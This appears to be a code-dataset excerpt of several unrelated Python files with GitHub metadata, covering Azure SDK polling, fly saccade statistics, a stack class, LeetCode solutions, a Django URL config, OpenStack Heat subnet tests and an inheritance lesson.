response = pipeline_response.http_response
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_upgrade_node_image_version.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"
}
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
527160e77429557933b7824c4d79f4ae526f1411
|
7d949b9f19e4c5c897b3aef76e604f2c0eee7112
|
/src-python/saccade_analysis/tammero_flydradb/report_axis_angle.py
|
88f17a3bd3e549f78714e134fbced84c944473c9
|
[] |
no_license
|
AndreaCensi/saccade_analysis
|
d3fad3a1a406b97c4dcf9cdc82b9b2ce1fbf42df
|
71b87e9225b16317ffa9a581b3c62d8343fe7bfa
|
refs/heads/master
| 2016-09-11T06:49:22.254391
| 2011-12-20T06:39:30
| 2011-12-20T06:39:30
| 952,465
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from contracts import contract
from reprep import Report
import numpy as np
from ..markov import binomial_stats
def create_report_axis_angle(id, desc, saccades):
r = Report('axis_angle')
#
# axis_angle = saccades['axis_angle']
# saccade_angle = saccades['saccade_angle']
stats = statistics_distance_axis_angle(saccades,
num_distance_intervals=10,
axis_angle_bin_interval=10,
axis_angle_bin_size=10
)
f = r.figure(cols=1)
for i, section in enumerate(stats['distance_sections']):
distance_min = section['distance_min']
distance_max = section['distance_max']
prob_left = section['prob_left']
prob_right = section['prob_right']
margin_left = section['margin_left']
margin_right = section['margin_right']
bin_centers = section['bin_centers']
num_saccades = section['num_saccades']
n = len(bin_centers)
with r.data_pylab('section%d' % i) as pylab:
el = np.zeros((2, n))
el[0, :] = +(margin_left[0, :] - prob_left)
el[1, :] = -(margin_left[1, :] - prob_left)
pylab.errorbar(bin_centers, prob_left, el, None, None,
ecolor='g', label='left', capsize=8, elinewidth=1)
er = np.zeros((2, n))
er[0, :] = +(margin_right[0, :] - prob_right)
er[1, :] = -(margin_right[1, :] - prob_right)
pylab.errorbar(bin_centers, prob_right, er, None, None,
ecolor='r', label='right', capsize=8, elinewidth=1)
pylab.plot(bin_centers, prob_left, 'g-', label='left')
pylab.plot(bin_centers, prob_right, 'r-', label='right')
pylab.xlabel('axis angle (deg)')
pylab.ylabel('probability of turning')
pylab.title('Direction probability for distance in [%dcm,%dcm], %d saccades' %
(distance_min * 100, distance_max * 100, num_saccades))
pylab.plot([0, 0], [0, 1], 'k-')
pylab.axis([-180, 180, 0, 1])
pylab.legend()
r.last().add_to(f)
return r
@contract(x='array[N]', direction='array[N]',
x_bin_centers='array[K]', x_bin_size='>0')
def compute_direction_statistics(x, x_bin_centers, x_bin_size, direction,
alpha=0.01):
K = len(x_bin_centers)
t_prob_left = np.zeros(K)
t_prob_right = np.zeros(K)
t_margin_left = np.zeros((2, K))
t_margin_right = np.zeros((2, K))
for k in range(K):
bin_center = x_bin_centers[k]
inbin = np.logical_and(x <= bin_center + x_bin_size / 2,
bin_center - x_bin_size / 2 <= x)
dirs = direction[inbin]
num = len(dirs)
num_left = (dirs > 0).sum()
num_right = (dirs < 0).sum()
prob_left, prob_right, margin_left, margin_right = \
binomial_stats(num, num_left, num_right, alpha)
t_prob_left[k] = prob_left
t_prob_right[k] = prob_right
t_margin_left[:, k] = margin_left
t_margin_right[:, k] = margin_right
return dict(bin_centers=x_bin_centers,
prob_left=t_prob_left,
prob_right=t_prob_right,
margin_left=t_margin_left,
margin_right=t_margin_right)
def statistics_distance_axis_angle(saccades,
num_distance_intervals,
axis_angle_bin_interval,
axis_angle_bin_size
):
distance = saccades['distance_from_wall']
qs = np.linspace(0, 100, num_distance_intervals)
# distance_edges = np.linspace(0, 1, distance_intervals)
distance_edges = np.percentile(distance, qs.tolist())
distance_num_sections = len(distance_edges) - 1
distance_sections = []
for di in range(distance_num_sections):
distance_min = distance_edges[di]
distance_max = distance_edges[di + 1]
select = np.logical_and(distance > distance_min,
distance < distance_max)
relevant_saccades = saccades[select]
bin_centers = range(-180, 180 + axis_angle_bin_interval,
axis_angle_bin_interval)
statistics = compute_direction_statistics(
x=relevant_saccades['axis_angle'],
x_bin_centers=np.array(bin_centers),
x_bin_size=axis_angle_bin_size,
direction=relevant_saccades['sign'])
statistics['num_saccades'] = len(relevant_saccades)
statistics['distance_min'] = distance_min
statistics['distance_max'] = distance_max
distance_sections.append(statistics)
return dict(distance_edges=distance_edges,
distance_sections=distance_sections)
|
[
"andrea@cds.caltech.edu"
] |
andrea@cds.caltech.edu
|
5b3ad54a4efaa9fbbbe546322a45748b042140c1
|
39b84306510530e39eb9d4087977ddd6b2ee203e
|
/self_assesment/self_assesment2/numericalStack.py
|
9b89874d425cc431c8b4a307eabb5975ea52bfef
|
[
"MIT"
] |
permissive
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
2ff9753a02ce1d2bdb113791d308391df19cc2f6
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
refs/heads/master
| 2022-12-31T02:02:23.566697
| 2020-09-12T06:59:03
| 2020-09-12T06:59:03
| 241,184,510
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
class Stack():
def __init__(self, val = []):
self._value = val
# print("Stack initialised!")
def push(self, x):
self._value.append(x)
# print ("{} is pushed into stack!!!".format(x))
return self
def pop(self):
if len(self._value) > 0:
self._value = self._value[1:]
# print ("Values popped")
else:
print ("Underflow - List is EMPTY!!!")
return self
def __len__(self):
val = 0
for i in self._value:
val += 1
return val
def is_Empty(self):
if len(self) == 0:
print ("The list is EMPTY!!!")
return True
else:
# print ("List isn't empty")
return False
def __repr__(self):
string = ""
for i in self._value:
string = string + str(i) + " "
return string
def top(self):
return self._value[0]
|
[
"sowmyamanojna@gmail.com"
] |
sowmyamanojna@gmail.com
|
9e66b3c83031a5eb2d06a77c03098a1f9a74c905
|
b332e9e5b63db27b23250ddbbb85b470ceaf92a1
|
/List/largestNumber.py
|
c4a880a23fc70378f9c187caa0e5aedc995c8561
|
[] |
no_license
|
huangketsudou/leetcode_python
|
66fcc695b0a4f94a35cc52e161ae4bfdb1138dc2
|
e983f42d245b69f9bddd9855f51ee59648a2039e
|
refs/heads/master
| 2021-08-07T23:25:45.532458
| 2020-08-23T06:15:22
| 2020-08-23T06:15:22
| 214,324,229
| 2
| 0
| null | 2020-04-12T14:40:47
| 2019-10-11T02:16:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
from typing import List
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [[] for _ in range(target+1)]
for i in range(1, target + 1):
for j, c in enumerate(cost):
if i == c:
dp[i]=self.cmp(dp[i],[j+1]).copy()
elif i > c:
if len(dp[i - c]):
b = dp[i - c].copy()
b.append(j + 1)
dp[i] = self.cmp(dp[i], b).copy()
for i in dp:
print(i)
return ''.join(map(str,dp[-1]))
def cmp(self, a, b):
a.sort(reverse=True)
b.sort(reverse=True)
if len(a) == len(b):
return a if a > b else b
elif len(a) < len(b):
return b
else:
return a
class Solution:
#@SQRPI
def largestNumber(self, cost: List[int], tar: int) -> str:
mi = min(cost)
@lru_cache(None)
def dp(target): # target 下的最大值
if target == 0: return 0
if target < mi: return -float('inf')
res = -float('inf')
for x in range(9):
res = max(dp(target - cost[x])*10 + x + 1, res)
return res
res = dp(tar)
return str(res) if res > 0 else "0"
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [-1 for j in range(target + 1)]
dp[0] = 0
for i in range(8, -1, -1):
for j in range(cost[i], target + 1):
if dp[j - cost[i]] < 0:
continue
dp[j] = max(dp[j], dp[j - cost[i]] * 10 + (i + 1))
if dp[target] >= 0:
return str(dp[target])
else:
return '0'
k = Solution()
print(k.largestNumber([1,1,1,1,1,1,1,1,1], 5000))
|
[
"1941161938@qq.com"
] |
1941161938@qq.com
|
781c73109fd82253400de9f5d6a1a1933c3ea874
|
84297380d00453e71f65c591dca046bd41a32184
|
/ABC/ABC158/B.py
|
908f7549a2b440db2e70bbd04547fea89beaef38
|
[] |
no_license
|
daiki1998/atcoder
|
a5ef25245b1bbc3a5e33044846a3c16213603bd3
|
d864a7cb11e41dbf6a691f5d128fdfe122b07046
|
refs/heads/main
| 2023-03-06T22:55:29.863716
| 2021-02-18T12:01:24
| 2021-02-18T12:01:24
| 323,401,954
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
N, A, B = map(int, input().split())
res, amari = N // (A+B), N % (A+B)
print(res*A + min(amari, A))
|
[
"shimokawadaiki@shimokawadaikinoMacBook-Pro.local"
] |
shimokawadaiki@shimokawadaikinoMacBook-Pro.local
|
f02286ccdd2739bd33ad6702398683ffcba4ff5d
|
402f90865d7de0bb7273c8e03de131d19c2e4318
|
/django_fullstack/urls.py
|
fee9fca5f611831511b2f3977956afedb1796883
|
[] |
no_license
|
yavorm-tech/django-fullstack
|
bc83b5687c767304bf6b5904ee207fd269ea4210
|
654c034dd438678faeeedaed30f618ee0ceccebe
|
refs/heads/master
| 2022-11-17T01:14:28.843249
| 2020-06-30T05:47:29
| 2020-06-30T05:47:29
| 275,743,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
"""django_fullstack URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path('admin/', admin.site.urls),
path('demo/', include('demo.urls')),
path('auth/', obtain_auth_token)
]
|
[
"="
] |
=
|
9a6e758c8f2fbb8e0949a60809a56b779c857f86
|
35be0509b6f98030ef5338033468710de1a536a3
|
/heat/heat/tests/neutron/test_neutron_subnet.py
|
b7962c3a6e84ffa2a768b1113132dc49cecc7188
|
[
"Apache-2.0"
] |
permissive
|
yizhongyin/OpenstackLiberty
|
6f2f0ff95bfb4204f3dbc74a1c480922dc387878
|
f705e50d88997ef7473c655d99f1e272ef857a82
|
refs/heads/master
| 2020-12-29T02:44:01.555863
| 2017-03-02T06:43:47
| 2017-03-02T06:43:47
| 49,924,385
| 0
| 1
| null | 2020-07-24T00:49:34
| 2016-01-19T03:45:06
|
Python
|
UTF-8
|
Python
| false
| false
| 19,507
|
py
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mox
from neutronclient.common import exceptions as qe
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.v2_0 import client as neutronclient
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.cfn import functions as cfn_funcs
from heat.engine.resources.openstack.neutron import subnet
from heat.engine import rsrc_defn
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
neutron_template = '''
heat_template_version: 2015-04-30
description: Template to test subnet Neutron resource
resources:
net:
type: OS::Neutron::Net
properties:
name: the_net
tenant_id: c1210485b2424d48804aad5d39c61b8f
shared: true
dhcp_agent_ids:
- 28c25a04-3f73-45a7-a2b4-59e183943ddc
sub_net:
type: OS::Neutron::Subnet
properties:
network: { get_resource : net}
tenant_id: c1210485b2424d48804aad5d39c61b8f
ip_version: 4
cidr: 10.0.3.0/24
allocation_pools:
- start: 10.0.3.20
end: 10.0.3.150
host_routes:
- destination: 10.0.4.0/24
nexthop: 10.0.3.20
dns_nameservers:
- 8.8.8.8
port:
type: OS::Neutron::Port
properties:
device_id: d6b4d3a5-c700-476f-b609-1493dd9dadc0
name: port1
network: { get_resource : net}
fixed_ips:
- subnet: { get_resource : sub_net }
ip_address: 10.0.3.21
port2:
type: OS::Neutron::Port
properties:
name: port2
network: { get_resource : net}
router:
type: OS::Neutron::Router
properties:
l3_agent_id: 792ff887-6c85-4a56-b518-23f24fa65581
router_interface:
type: OS::Neutron::RouterInterface
properties:
router_id: { get_resource : router }
subnet: { get_resource : sub_net }
gateway:
type: OS::Neutron::RouterGateway
properties:
router_id: { get_resource : router }
network: { get_resource : net}
'''
neutron_template_deprecated = neutron_template.replace(
'neutron', 'neutron_id').replace('subnet', 'subnet_id')
class NeutronSubnetTest(common.HeatTestCase):
def setUp(self):
super(NeutronSubnetTest, self).setUp()
self.m.StubOutWithMock(neutronclient.Client, 'create_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'delete_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'show_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'update_subnet')
self.m.StubOutWithMock(neutronV20, 'find_resourceid_by_name_or_id')
def create_subnet(self, t, stack, resource_name):
resource_defns = stack.t.resource_definitions(stack)
rsrc = subnet.Subnet('test_subnet', resource_defns[resource_name],
stack)
return rsrc
def test_subnet(self):
update_props = {'subnet': {
'dns_nameservers': ['8.8.8.8', '192.168.1.254'],
'name': 'mysubnet',
'enable_dhcp': True,
'host_routes': [{'destination': '192.168.1.0/24',
'nexthop': '194.168.1.2'}],
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.100"},
{"start": "10.0.3.110", "end": "10.0.3.200"}]}}
t = self._test_subnet(u_props=update_props)
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIsNone(rsrc.FnGetAtt('network_id'))
self.assertEqual('fc68ea2c-b60b-4b4f-bd82-94ec81110766',
rsrc.FnGetAtt('network_id'))
self.assertEqual('8.8.8.8', rsrc.FnGetAtt('dns_nameservers')[0])
# assert the dependency (implicit or explicit) between the ports
# and the subnet
self.assertIn(stack['port'], stack.dependencies[stack['sub_net']])
self.assertIn(stack['port2'], stack.dependencies[stack['sub_net']])
props = {
"name": 'mysubnet',
"network_id": cfn_funcs.ResourceRef(stack, "get_resource", "net"),
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"ip_version": 4,
"cidr": "10.0.3.0/24",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.100"},
{"start": "10.0.3.110", "end": "10.0.3.200"}],
"dns_nameservers": ["8.8.8.8", "192.168.1.254"],
"host_routes": [
{"destination": "192.168.1.0/24", "nexthop": "194.168.1.2"}
]
}
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name, rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
rsrc.state_set(rsrc.CREATE, rsrc.COMPLETE, 'to delete again')
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.m.VerifyAll()
def test_subnet_deprecated(self):
t = self._test_subnet(resolve_neutron=False)
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIsNone(rsrc.FnGetAtt('network_id'))
self.assertEqual('fc68ea2c-b60b-4b4f-bd82-94ec81110766',
rsrc.FnGetAtt('network_id'))
self.assertEqual('8.8.8.8', rsrc.FnGetAtt('dns_nameservers')[0])
# assert the dependency (implicit or explicit) between the ports
# and the subnet
self.assertIn(stack['port'], stack.dependencies[stack['sub_net']])
self.assertIn(stack['port2'], stack.dependencies[stack['sub_net']])
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
rsrc.state_set(rsrc.CREATE, rsrc.COMPLETE, 'to delete again')
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.m.VerifyAll()
def _test_subnet(self, resolve_neutron=True, u_props=None):
default_update_props = {'subnet': {
'dns_nameservers': ['8.8.8.8', '192.168.1.254'],
'name': 'mysubnet',
'enable_dhcp': True,
'host_routes': [{'destination': '192.168.1.0/24',
'nexthop': '194.168.1.2'}]}}
update_props = u_props if u_props else default_update_props
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'8.8.8.8'],
'allocation_pools': [
{'start': u'10.0.3.20', 'end': u'10.0.3.150'}],
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
'ip_version': 4,
'cidr': u'10.0.3.0/24',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'enable_dhcp': True
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"enable_dhcp": True,
"gateway_ip": "10.0.3.1",
"host_routes": [
{"destination": "10.0.4.0/24", "nexthop": "10.0.3.20"}],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 4,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f"
}
})
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndRaise(
qe.NeutronClientException(status_code=404))
sn = {
"subnet": {
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"gateway_ip": "10.0.3.1",
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
"ip_version": 4,
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"enable_dhcp": True,
}
}
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
# Delete script
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndReturn(None)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
if resolve_neutron:
t = template_format.parse(neutron_template)
# Update script
neutronclient.Client.update_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1', update_props)
else:
t = template_format.parse(neutron_template_deprecated)
return t
def test_subnet_disable_dhcp(self):
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'8.8.8.8'],
'allocation_pools': [
{'start': u'10.0.3.20', 'end': u'10.0.3.150'}],
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
'ip_version': 4,
'enable_dhcp': False,
'cidr': u'10.0.3.0/24',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"host_routes": [
{"destination": "10.0.4.0/24", "nexthop": "10.0.3.20"}],
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"enable_dhcp": False,
"gateway_ip": "10.0.3.1",
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 4,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f"
}
})
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn({
"subnet": {
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"host_routes": [
{"destination": "10.0.4.0/24",
"nexthop": "10.0.3.20"}],
"gateway_ip": "10.0.3.1",
"ip_version": 4,
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"enable_dhcp": False,
}
})
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndReturn(None)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
self.m.ReplayAll()
t = template_format.parse(neutron_template)
t['resources']['sub_net']['properties']['enable_dhcp'] = 'False'
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIs(False, rsrc.FnGetAtt('enable_dhcp'))
scheduler.TaskRunner(rsrc.delete)()
self.m.VerifyAll()
def test_null_gateway_ip(self):
p = {}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({}, p)
p = {'foo': 'bar'}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({'foo': 'bar'}, p)
p = {
'foo': 'bar',
'gateway_ip': '198.51.100.0'
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': '198.51.100.0'
}, p)
p = {
'foo': 'bar',
'gateway_ip': ''
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': None
}, p)
# This should not happen as prepare_properties
# strips out None values, but testing anyway
p = {
'foo': 'bar',
'gateway_ip': None
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': None
}, p)
def test_ipv6_subnet(self):
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'2001:4860:4860::8844'],
'ip_version': 6,
'enable_dhcp': True,
'cidr': u'fdfa:6a50:d22b::/64',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'ipv6_address_mode': 'slaac',
'ipv6_ra_mode': 'slaac'
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "fdfa:6a50:d22b::2",
"end": "fdfa:6a50:d22b:0:ffff:ffff:ffff:fffe"}],
"cidr": "fd00:1::/64",
"enable_dhcp": True,
"gateway_ip": "fdfa:6a50:d22b::1",
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 6,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
'ipv6_address_mode': 'slaac',
'ipv6_ra_mode': 'slaac'
}
})
self.m.ReplayAll()
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props.pop('allocation_pools')
props.pop('host_routes')
props['ip_version'] = 6
props['ipv6_address_mode'] = 'slaac'
props['ipv6_ra_mode'] = 'slaac'
props['cidr'] = 'fdfa:6a50:d22b::/64'
props['dns_nameservers'] = ['2001:4860:4860::8844']
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
self.m.VerifyAll()
def test_ipv6_validate_ra_mode(self):
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props['ipv6_address_mode'] = 'dhcpv6-stateful'
props['ipv6_ra_mode'] = 'slaac'
props['ip_version'] = 6
stack = utils.parse_stack(t)
rsrc = stack['sub_net']
ex = self.assertRaises(exception.StackValidationFailed,
rsrc.validate)
self.assertEqual("When both ipv6_ra_mode and ipv6_address_mode are "
"set, they must be equal.", six.text_type(ex))
def test_ipv6_validate_ip_version(self):
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props['ipv6_address_mode'] = 'slaac'
props['ipv6_ra_mode'] = 'slaac'
props['ip_version'] = 4
stack = utils.parse_stack(t)
rsrc = stack['sub_net']
ex = self.assertRaises(exception.StackValidationFailed,
rsrc.validate)
self.assertEqual("ipv6_ra_mode and ipv6_address_mode are not "
"supported for ipv4.", six.text_type(ex))
def test_deprecated_network_id(self):
template = """
heat_template_version: 2015-04-30
resources:
net:
type: OS::Neutron::Net
properties:
name: test
subnet:
type: OS::Neutron::Subnet
properties:
network_id: { get_resource: net }
cidr: 10.0.0.0/24
"""
t = template_format.parse(template)
stack = utils.parse_stack(t)
rsrc = stack['subnet']
stack.create()
self.assertEqual(cfn_funcs.ResourceRef(stack, 'get_resource', 'net'),
rsrc.properties.get('network'))
self.assertIsNone(rsrc.properties.get('network_id'))
|
[
"yizhongyin@os-easy.com"
] |
yizhongyin@os-easy.com
|
432f9038e0b00672bb1870647b074519e43c0350
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/homework_zero_class/lesson13/多重继承-times_3.py
|
be4ae74b66504ab6fd49cf872d6296e34b224f30
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041
| 2020-08-24T08:39:00
| 2020-08-24T08:39:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,190
|
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/3 14:45
# @Author:老萝卜
# @file:多重继承-times_3
# @Software:%{PRODUICT_NAME}多重继承-times_3.py
class A(object):
def test(self):
print("A......")
def test1(self):
print("A-test1......")
def test3(self):
print("A-test3......")
class B(object):
def test(self):
print("B......")
def test2(self):
print("B-test2......")
class C(B):
pass
# __bases__ 可以获取当前类所有的父类
print(C.__bases__)
print(B.__bases__)
# (<class '__main__.B'>,)
# (<class 'object'>,)
# Python中是支持多重继承的,也就是我们可以为一个类同时指定多个父类
# 可以在类名后的()中添加多个类,实现多重继承
# 多重继承,会使子类同时拥有多个父类,并且会获取到所有父类的方法
class C(A,B):
pass
print(C.__bases__)
# (<class '__main__.A'>, <class '__main__.B'>)
# 如果多个父类中有重名的方法,则会先去第一个父类中寻找,然后第二个,在然后第三个...
class C(B,A):
pass
c= C()
c.test()
c.test1()
c.test2()
c.test3()
# B......
# A-test1......
# B-test2......
# A-test3......
|
[
"newwxm@126.com"
] |
newwxm@126.com
|
82e34d60193e623a88db412888e04f745cbe0e2a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Classes/Onderdeel/Plantbakvorm.py
|
8e481ff412fa8be69732c95c697b72f328907b15
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.Abstracten.VegetatieElement import VegetatieElement
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.KwantWrdInKubiekeMeter import KwantWrdInKubiekeMeter
from OTLMOW.OTLModel.Datatypes.KwantWrdInVierkanteMeter import KwantWrdInVierkanteMeter
from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie
